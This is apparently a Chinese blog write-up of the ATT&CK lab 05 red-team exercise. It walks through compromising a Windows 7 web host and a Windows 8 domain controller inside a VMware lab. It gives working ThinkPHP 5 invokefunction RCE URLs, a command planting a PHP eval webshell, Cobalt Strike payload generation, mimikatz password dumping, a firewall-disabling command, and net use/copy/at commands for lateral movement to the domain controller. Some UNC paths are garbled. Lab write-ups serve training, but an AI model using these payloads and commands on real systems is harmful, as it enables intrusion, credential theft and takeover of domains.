ATT&CK 05

该文详细描述了如何在VMware环境下配置kali、win7和win8的网络设置,利用ThinkPHP漏洞对win7进行信息收集和命令执行。通过蚁剑连接,获取系统权限并关闭防火墙。接着,文中展示了如何利用CS(CobaltStrike)创建木马,通过win7中转实现对域控win8的上线,进行横向移动并读取域管理员密码,最终达到提权的目的。
摘要由CSDN通过智能技术生成

环境搭建   

自行下载安装包 解压

VMware中

win7  win8 同样方法

所要用到的攻击机为kali  

调节kali的网络适配器为vmnet8 

调节win7的网络适配器  增加vmnet5用来连接内网

win8 vmnet5

名称

ip

角色

kali

192.168.115.129

攻击机

win7

192.168.115.150

192.168.138.136

win8

192.168.138.138

DC

拓扑图

利用kali来信息收集

探测到win7主机ip  115.150

进入win7  查看其ip  外网地址为192.168.115.150  内网地址为192.168.138.136

手动关闭win7防火墙  以便后续操作  (后面也可利用cs关闭)

到c盘中开启phpstudy

利用kali进行扫描

发现端口80开放  尝试访问

一个网站 上面ThinkPHPV5的框架  想到thinkphp漏洞

这里我们先不上工具  

测试thinkphp版本

找到版本漏洞的poc 可以命令执行

http://192.168.115.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://192.168.115.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

查看当前路径

http://192.168.115.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd

写一句木马getshell

http://192.168.115.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST['666']); ?^> > C:\phpStudy\PHPTutorial\WWW\public\shell.php

使用蚁剑连接

连接成功

查看当前域环境

域名sun.conn

然后ping一下sun.conn 拿到域控ip

接下来进行横向移动  上线CS 

kali作为服务端

在本机打开客户端

ip为kali ip 密码123456

连接成功

先创建监听器

生成windows exe木马

选择artifact.exe

生成木马链接

选择刚刚的artifact.exe  及命名要生成文件的名字

创建成功   

使用本机下载  利用蚁剑上场到win7的桌面上  

再利用蚁剑对其进行运行  CS就会捕捉到win7

运行mimikatz 读到了域管理员的密码

提权

系统权限管理员上线

我们也可以利用CS关闭防火墙  (shell netsh firewall set opmode disable)

利用系统权限的win7来让dc win8上线

在win7上设置中转监听

命名为dc

中转监听

开启端口

再次生成木马

利用蚁剑上传木马和psexec (psexec:微软官方实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。)

使用命令执行木马    (shell net use\\192.168.138.138\̲i̲p̲c̲ “!qazwin7” /user:administrator)

(shell copy c:\win2008cs.exe \192.168.138.138\c$)

执行木马  (shell at \192.168.138.138 c:\2008cs.exe)

也可利用蚁剑执行

dc上线

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值